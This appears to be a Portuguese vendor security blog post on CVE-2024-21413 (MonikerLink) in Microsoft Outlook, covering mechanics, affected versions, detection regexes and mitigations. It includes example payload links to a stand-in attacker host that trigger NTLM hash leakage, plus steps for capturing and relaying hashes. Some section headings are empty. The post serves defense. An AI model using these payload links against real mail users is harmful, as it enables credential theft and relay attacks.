剣 KENSAI
Crítico CVE-2024-21413 Janeiro 2026 · 8 min de leitura

CVE-2024-21413: MonikerLink do Microsoft Outlook RCE

Apelidado de “MonikerLink”, CVE-2024-21413 é uma vulnerabilidade crítica do Microsoft Outlook que ignora o Protected View para obter execução remota de código e roubo de credenciais NTLM – simplesmente visualizando um e-mail malicioso. CVSS 9.8 CRÍTICO. Nenhuma interação do usuário além da visualização do email é necessária.


9.8
CRÍTICO
AtributoValor
ID do CVECVE-2024-21413
Vetor CVSSAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-20: Validação de entrada inadequada
Publicado13 de fevereiro de 2024
ExploraçãoPoC público – amplamente explorado

O que é CVE-2024-21413?

CVE-2024-21413 explora a maneira como o Microsoft Outlook lida com hiperlinks contendo o ! (ponto de exclamação) como parte de um URI de identificador de arquivo. Normalmente, o Outlook aplica a "Visualização Protegida" a documentos abertos por e-mail - colocando em sandbox documentos do Office para evitar a execução de código. Esta vulnerabilidade ignora totalmente essa proteção.

Criando um hiperlink no formato file://ATTACKER-SERVER/test.rtf!something, um invasor faz com que o Outlook abra o arquivo RTF sem o Modo de Exibição Protegido e, ao mesmo tempo, aciona uma tentativa automática de autenticação NTLM para o servidor SMB do invasor. O invasor captura o hash NTLMv2 para cracking offline ou ataques de retransmissão.

🚨 Ataque do painel de visualização – não é necessário clicar

Esta vulnerabilidade é desencadeada no painel de visualização do Outlook. A vítima só precisa selecione o e-mail em sua caixa de entrada - sem abertura de anexo, sem necessidade de clicar em link. Em um ambiente corporativo, um único email de phishing enviado para uma lista de distribuição pode comprometer centenas de hashes NTLMv2 simultaneamente.

Produtos afetados

ProdutoVersões afetadas
Microsoft Outlook 2016Antes da atualização de fevereiro de 2024
Microsoft Outlook 2019Antes da atualização de fevereiro de 2024
Microsoft Outlook LTSC 2021Antes da atualização de fevereiro de 2024
Aplicativos Microsoft 365 para empresasAntes da atualização de fevereiro de 2024

Não afetado: Outlook na Web (OWA), Outlook para iOS/Android, Outlook para Mac. A vulnerabilidade é específica para clientes desktop do Outlook para Windows.

Mecânica de ataque: a técnica MonikerLink

O COM do Windows (Modelo de Objeto Componente) usa "monikers" para vincular objetos por nome. O file:// O esquema URI no Windows pode incluir um componente de moniker após o ! caractere, que instrui Windows a carregar e ativar o objeto COM referenciado.

# Normal file link — Protected View applied
file://attacker.com/share/document.rtf

# MonikerLink bypass — ! bypasses Protected View
file://attacker.com/share/document.rtf!1337

# When Outlook processes the MonikerLink:
# 1. Attempts SMB connection to attacker.com
# 2. Sends NTLMv2 authentication (captures hash)
# 3. Opens file without Protected View
# 4. If file is malicious RTF → RCE

Fluxo de captura de hash NTLM

Mesmo sem um arquivo RTF armado, o ataque de retransmissão NTLM é impactante:

  1. Vítima visualiza e-mail malicioso no Outlook
  2. Outlook faz conexão SMB automática com servidor controlado por invasor
  3. Windows envia resposta de desafio NTLMv2 (hash) para autenticação
  4. O invasor captura hash com Responder, Impacket ou ferramentas semelhantes
  5. Hash quebrado offline (senhas fracas em horas) ou retransmitido em tempo real para outros serviços

Exploração no mundo real

Após o lançamento público do PoC, o CVE-2024-21413 foi incorporado aos kits de ferramentas comerciais de phishing em poucos dias. As campanhas observadas incluíram:

Detecção

Regras do gateway de e-mail

# Regex pattern for MonikerLink in email body/attachments
# Detect file:// links containing ! character
\bfile:\/\/[^\s"']+![^\s"']*

# Block external UNC/file links entirely (recommended)
\bfile:\/\/[^\s"']+
\\\\[a-z0-9.-]+\\

Detecção de rede

Detecção de endpoint

Mitigação

  1. Aplique os patches de fevereiro de 2024: A Atualização de Segurança da Microsoft para Outlook aborda o desvio do Modo de Exibição Protegido
  2. Bloquear saída SMB no perímetro: As regras de firewall que bloqueiam a saída TCP/445 e TCP/139 impedem a captura de hash NTLM mesmo se a vulnerabilidade for acionada
  3. Ative as proteções de relé NTLM: Configure a assinatura SMB e a assinatura LDAP para evitar ataques de retransmissão
  4. Implante o gateway de segurança de e-mail: Bloquear e-mails contendo file:// e \\ (caminho UNC) links no corpo e anexos
  5. Desative o NTLM sempre que possível: As organizações que usam Kerberos podem desabilitar o NTLM para eliminar o caminho de ataque de captura de hash

💡 Defesa em profundidade: Mesmo que você tenha corrigido o Outlook, bloquear SMB de saída no firewall é uma prática recomendada que evita toda essa classe de ataques. Muitas organizações permitem SMB de saída por motivos de compartilhamento de arquivos legados – audite e restrinja isso imediatamente.

Capacidade de detecção KENSAI

Seus clientes Outlook estão corrigidos contra o MonikerLink?

KENSAI verifica sua frota de endpoints em busca de versões vulneráveis ​​do Outlook e identifica caminhos de rede que permitiriam a captura de hash NTLM. Obtenha visibilidade em minutos.

Avalie sua superfície de ataque por e-mail →

Artigos relacionados

Plataforma de segurança de avaliação de certificação e gerenciamento de vulnerabilidades ISO 27001 Blog de segurança Microsoft Patch Tuesday 84 lançado pelo Stryker